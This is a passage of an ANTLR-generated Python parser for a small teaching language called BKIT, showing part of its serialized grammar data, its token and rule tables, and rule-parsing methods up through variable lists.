buf.write(\"\\u013c\\3\\2\\2\\2\\u013e\\u013d\\3\\2\\2\\2\\u013f\\u0140\\3\\2\\2\\2\")\n buf.write(\"\\u0140\\u0141\\7>\\2\\2\\u0141\\u0142\\5> \\2\\u0142/\\3\\2\\2\\2\\u0143\")\n buf.write(\"\\u0144\\7\\t\\2\\2\\u0144\\61\\3\\2\\2\\2\\u0145\\u0146\\7\\n\\2\\2\\u0146\")\n buf.write(\"\\63\\3\\2\\2\\2\\u0147\\u0148\\5R*\\2\\u0148\\65\\3\\2\\2\\2\\u0149\\u014b\")\n buf.write(\"\\7\\26\\2\\2\\u014a\\u014c\\5> \\2\\u014b\\u014a\\3\\2\\2\\2\\u014b\")\n buf.write(\"\\u014c\\3\\2\\2\\2\\u014c\\67\\3\\2\\2\\2\\u014d\\u014e\\5\\22\\n\\2\\u014e\")\n buf.write(\"\\u014f\\7>\\2\\2\\u014f\\u0150\\5> \\2\\u01509\\3\\2\\2\\2\\u0151\\u0152\")\n buf.write(\"\\5> \\2\\u0152;\\3\\2\\2\\2\\u0153\\u0154\\5> \\2\\u0154=\\3\\2\\2\\2\")\n buf.write(\"\\u0155\\u0156\\5@!\\2\\u0156\\u0157\\t\\3\\2\\2\\u0157\\u0158\\5@\")\n buf.write(\"!\\2\\u0158\\u015b\\3\\2\\2\\2\\u0159\\u015b\\5@!\\2\\u015a\\u0155\")\n buf.write(\"\\3\\2\\2\\2\\u015a\\u0159\\3\\2\\2\\2\\u015b?\\3\\2\\2\\2\\u015c\\u015d\")\n buf.write(\"\\b!\\1\\2\\u015d\\u015e\\5B\\\"\\2\\u015e\\u0164\\3\\2\\2\\2\\u015f\\u0160\")\n buf.write(\"\\f\\4\\2\\2\\u0160\\u0161\\t\\4\\2\\2\\u0161\\u0163\\5B\\\"\\2\\u0162\")\n buf.write(\"\\u015f\\3\\2\\2\\2\\u0163\\u0166\\3\\2\\2\\2\\u0164\\u0162\\3\\2\\2\\2\")\n buf.write(\"\\u0164\\u0165\\3\\2\\2\\2\\u0165A\\3\\2\\2\\2\\u0166\\u0164\\3\\2\\2\")\n buf.write(\"\\2\\u0167\\u0168\\b\\\"\\1\\2\\u0168\\u0169\\5D#\\2\\u0169\\u016f\\3\")\n buf.write(\"\\2\\2\\2\\u016a\\u016b\\f\\4\\2\\2\\u016b\\u016c\\t\\5\\2\\2\\u016c\\u016e\")\n buf.write(\"\\5D#\\2\\u016d\\u016a\\3\\2\\2\\2\\u016e\\u0171\\3\\2\\2\\2\\u016f\\u016d\")\n buf.write(\"\\3\\2\\2\\2\\u016f\\u0170\\3\\2\\2\\2\\u0170C\\3\\2\\2\\2\\u0171\\u016f\")\n buf.write(\"\\3\\2\\2\\2\\u0172\\u0173\\b#\\1\\2\\u0173\\u0174\\5F$\\2\\u0174\\u017a\")\n buf.write(\"\\3\\2\\2\\2\\u0175\\u0176\\f\\4\\2\\2\\u0176\\u0177\\t\\6\\2\\2\\u0177\")\n buf.write(\"\\u0179\\5F$\\2\\u0178\\u0175\\3\\2\\2\\2\\u0179\\u017c\\3\\2\\2\\2\\u017a\")\n buf.write(\"\\u0178\\3\\2\\2\\2\\u017a\\u017b\\3\\2\\2\\2\\u017bE\\3\\2\\2\\2\\u017c\")\n buf.write(\"\\u017a\\3\\2\\2\\2\\u017d\\u017e\\7&\\2\\2\\u017e\\u0181\\5F$\\2\\u017f\")\n buf.write(\"\\u0181\\5H%\\2\\u0180\\u017d\\3\\2\\2\\2\\u0180\\u017f\\3\\2\\2\\2\\u0181\")\n buf.write(\"G\\3\\2\\2\\2\\u0182\\u0183\\t\\7\\2\\2\\u0183\\u0186\\5H%\\2\\u0184\")\n buf.write(\"\\u0186\\5J&\\2\\u0185\\u0182\\3\\2\\2\\2\\u0185\\u0184\\3\\2\\2\\2\\u0186\")\n buf.write(\"I\\3\\2\\2\\2\\u0187\\u0188\\5L\\'\\2\\u0188\\u0189\\5T+\\2\\u0189\\u018c\")\n buf.write(\"\\3\\2\\2\\2\\u018a\\u018c\\5L\\'\\2\\u018b\\u0187\\3\\2\\2\\2\\u018b\")\n buf.write(\"\\u018a\\3\\2\\2\\2\\u018cK\\3\\2\\2\\2\\u018d\\u0190\\5R*\\2\\u018e\")\n buf.write(\"\\u0190\\5N(\\2\\u018f\\u018d\\3\\2\\2\\2\\u018f\\u018e\\3\\2\\2\\2\\u0190\")\n buf.write(\"M\\3\\2\\2\\2\\u0191\\u0197\\5P)\\2\\u0192\\u0193\\7\\64\\2\\2\\u0193\")\n buf.write(\"\\u0194\\5> \\2\\u0194\\u0195\\7\\65\\2\\2\\u0195\\u0197\\3\\2\\2\\2\")\n buf.write(\"\\u0196\\u0191\\3\\2\\2\\2\\u0196\\u0192\\3\\2\\2\\2\\u0197O\\3\\2\\2\")\n buf.write(\"\\2\\u0198\\u019c\\5\\24\\13\\2\\u0199\\u019c\\5\\n\\6\\2\\u019a\\u019c\")\n buf.write(\"\\5\\f\\7\\2\\u019b\\u0198\\3\\2\\2\\2\\u019b\\u0199\\3\\2\\2\\2\\u019b\")\n buf.write(\"\\u019a\\3\\2\\2\\2\\u019cQ\\3\\2\\2\\2\\u019d\\u019e\\7\\3\\2\\2\\u019e\")\n buf.write(\"\\u01a9\\7\\64\\2\\2\\u019f\\u01a4\\5> \\2\\u01a0\\u01a1\\7=\\2\\2\\u01a1\")\n buf.write(\"\\u01a3\\5> \\2\\u01a2\\u01a0\\3\\2\\2\\2\\u01a3\\u01a6\\3\\2\\2\\2\\u01a4\")\n buf.write(\"\\u01a2\\3\\2\\2\\2\\u01a4\\u01a5\\3\\2\\2\\2\\u01a5\\u01a8\\3\\2\\2\\2\")\n buf.write(\"\\u01a6\\u01a4\\3\\2\\2\\2\\u01a7\\u019f\\3\\2\\2\\2\\u01a8\\u01ab\\3\")\n buf.write(\"\\2\\2\\2\\u01a9\\u01a7\\3\\2\\2\\2\\u01a9\\u01aa\\3\\2\\2\\2\\u01aa\\u01ac\")\n buf.write(\"\\3\\2\\2\\2\\u01ab\\u01a9\\3\\2\\2\\2\\u01ac\\u01ad\\7\\65\\2\\2\\u01ad\")\n buf.write(\"S\\3\\2\\2\\2\\u01ae\\u01af\\7\\66\\2\\2\\u01af\\u01b0\\5> \\2\\u01b0\")\n buf.write(\"\\u01b1\\7\\67\\2\\2\\u01b1\\u01b8\\3\\2\\2\\2\\u01b2\\u01b3\\7\\66\\2\")\n buf.write(\"\\2\\u01b3\\u01b4\\5> \\2\\u01b4\\u01b5\\7\\67\\2\\2\\u01b5\\u01b6\")\n buf.write(\"\\5T+\\2\\u01b6\\u01b8\\3\\2\\2\\2\\u01b7\\u01ae\\3\\2\\2\\2\\u01b7\\u01b2\")\n buf.write(\"\\3\\2\\2\\2\\u01b8U\\3\\2\\2\\2*[apy\\177\\u0090\\u0095\\u0099\\u009c\")\n buf.write(\"\\u00a2\\u00a7\\u00ab\\u00b6\\u00b9\\u00bf\\u00c5\\u00cd\\u00d0\")\n buf.write(\"\\u00d5\\u00e4\\u00ec\\u00f2\\u0108\\u0115\\u011a\\u013e\\u014b\")\n buf.write(\"\\u015a\\u0164\\u016f\\u017a\\u0180\\u0185\\u018b\\u018f\\u0196\")\n buf.write(\"\\u019b\\u01a4\\u01a9\\u01b7\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=/='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \"'int_of_string'\", \n \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \n \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \n \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \n \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_array = 3\n RULE_primitive_data = 4\n RULE_composite_data = 5\n RULE_array_lit = 6\n RULE_var_list = 7\n RULE_scalar_var = 8\n RULE_var_non_init = 9\n RULE_composite_var = 10\n RULE_var_init = 11\n RULE_composite_init = 12\n RULE_primitive_init = 13\n RULE_params_list = 14\n RULE_stmt_list = 15\n RULE_stmt = 16\n RULE_if_stmt = 17\n RULE_var_declare_stmt = 18\n RULE_for_stmt = 19\n RULE_while_stmt = 20\n RULE_dowhile_stmt = 21\n RULE_assign_stmt = 22\n RULE_break_stmt = 23\n RULE_continue_stmt = 24\n RULE_call_stmt = 25\n RULE_return_stmt = 26\n RULE_init_for = 27\n RULE_con_for = 28\n RULE_update_for = 29\n RULE_expr = 30\n RULE_expr1 = 31\n RULE_expr2 = 32\n RULE_expr3 = 33\n RULE_expr4 = 34\n RULE_expr5 = 35\n RULE_expr6 = 36\n RULE_expr7 = 37\n RULE_expr8 = 38\n RULE_operand = 39\n RULE_function_call = 40\n RULE_index_op = 41\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"array\", \n \"primitive_data\", \"composite_data\", \"array_lit\", \"var_list\", \n \"scalar_var\", \"var_non_init\", \"composite_var\", \"var_init\", \n \"composite_init\", \"primitive_init\", \"params_list\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"init_for\", \"con_for\", \"update_for\", \n \"expr\", \"expr1\", \"expr2\", \"expr3\", \"expr4\", \"expr5\", \n \"expr6\", \"expr7\", \"expr8\", \"operand\", \"function_call\", \n \"index_op\" ]\n\n EOF = Token.EOF\n ID=1\n INT_LIT=2\n FLOAT_LIT=3\n BOOL_LIT=4\n STRING_LIT=5\n BODY=6\n BREAK=7\n CONTINUE=8\n DO=9\n ELSE=10\n ELSEIF=11\n ENDIF=12\n ENDBODY=13\n ENDFOR=14\n ENDWHILE=15\n FOR=16\n FUNCTION=17\n IF=18\n PARAMETER=19\n RETURN=20\n THEN=21\n VAR=22\n WHILE=23\n TRUE=24\n FALSE=25\n ENDDO=26\n PLUS_INT=27\n PLUS_FLOAT=28\n MINUS_INT=29\n MINUS_FLOAT=30\n STAR_INT=31\n STAR_FLOAT=32\n DIV_INT=33\n DIV_FLOAT=34\n MOD=35\n NOT=36\n AND=37\n OR=38\n EQUAL=39\n NOT_EQUAL_INT=40\n LESS_INT=41\n GREATER_INT=42\n LESS_OR_EQUAL_INT=43\n GREATER_OR_EQUAL_INT=44\n NOT_EQUAL_FLOAT=45\n LESS_FLOAT=46\n GREATER_FLOAT=47\n LESS_OR_EQUAL_FLOAT=48\n GREATER_OR_EQUAL_FLOAT=49\n LEFT_PAREN=50\n RIGHT_PAREN=51\n LEFT_BRACKET=52\n RIGHT_BRACKET=53\n LEFT_BRACE=54\n RIGHT_BRACE=55\n COLON=56\n DOT=57\n SEMI=58\n COMMA=59\n ASSIGN=60\n DOUBLE_QUOTE=61\n INT_OF_FLOAT=62\n INT_OF_STRING=63\n FLOAT_TO_INT=64\n FLOAT_OF_STRING=65\n BOOL_OF_STRING=66\n STRING_OF_BOOL=67\n STRING_OF_INT=68\n STRING_OF_FLOAT=69\n COMMENT=70\n WS=71\n ILLEGAL_ESCAPE=72\n UNCLOSE_STRING=73\n UNTERMINATED_COMMENT=74\n ERROR_CHAR=75\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 84\n self.var_declare()\n self.state = 85\n self.match(BKITParser.SEMI)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 95\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 92\n self.function_declare()\n self.state = 97\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 98\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare\" ):\n return visitor.visitVar_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 100\n self.match(BKITParser.VAR)\n self.state = 101\n self.match(BKITParser.COLON)\n self.state = 102\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_declare\" ):\n return visitor.visitFunction_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 104\n self.match(BKITParser.FUNCTION)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 106\n self.match(BKITParser.ID)\n self.state = 110\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 107\n self.match(BKITParser.PARAMETER)\n self.state = 108\n self.match(BKITParser.COLON)\n self.state = 109\n self.params_list()\n\n\n self.state = 112\n self.match(BKITParser.BODY)\n self.state = 113\n self.match(BKITParser.COLON)\n self.state = 119\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 114\n self.var_declare_stmt()\n self.state = 115\n self.match(BKITParser.SEMI)\n self.state = 121\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 125\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE))) != 0):\n self.state = 122\n self.stmt()\n self.state = 127\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 128\n self.match(BKITParser.ENDBODY)\n self.state = 129\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray\" ):\n return visitor.visitArray(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 131\n self.match(BKITParser.ID)\n self.state = 132\n self.match(BKITParser.ASSIGN)\n self.state = 133\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_data\" ):\n return visitor.visitPrimitive_data(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 135\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_data\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_data\" ):\n return visitor.visitComposite_data(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_data(self):\n\n localctx = BKITParser.Composite_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_composite_data)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 137\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def composite_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray_lit\" ):\n return visitor.visitArray_lit(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 139\n self.match(BKITParser.LEFT_BRACE)\n self.state = 154\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 142\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 140\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 141\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 151\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 144\n self.match(BKITParser.COMMA)\n self.state = 147\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 145\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 146\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 153\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 156\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_list\" ):\n return visitor.visitVar_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 160\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.state = 158\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 159\n self.var_init()\n pass\n\n\n self.state = 169\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 162\n self.match(BKITParser.COMMA)\n self.state = 165\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 163\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 164\n self.var_init()\n pass\n\n\n self.state = 171\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Scalar_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_scalar_var\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitScalar_var\" ):\n return visitor.visitScalar_var(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def scalar_var(self):\n\n localctx = BKITParser.Scalar_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_scalar_var)\n try:\n 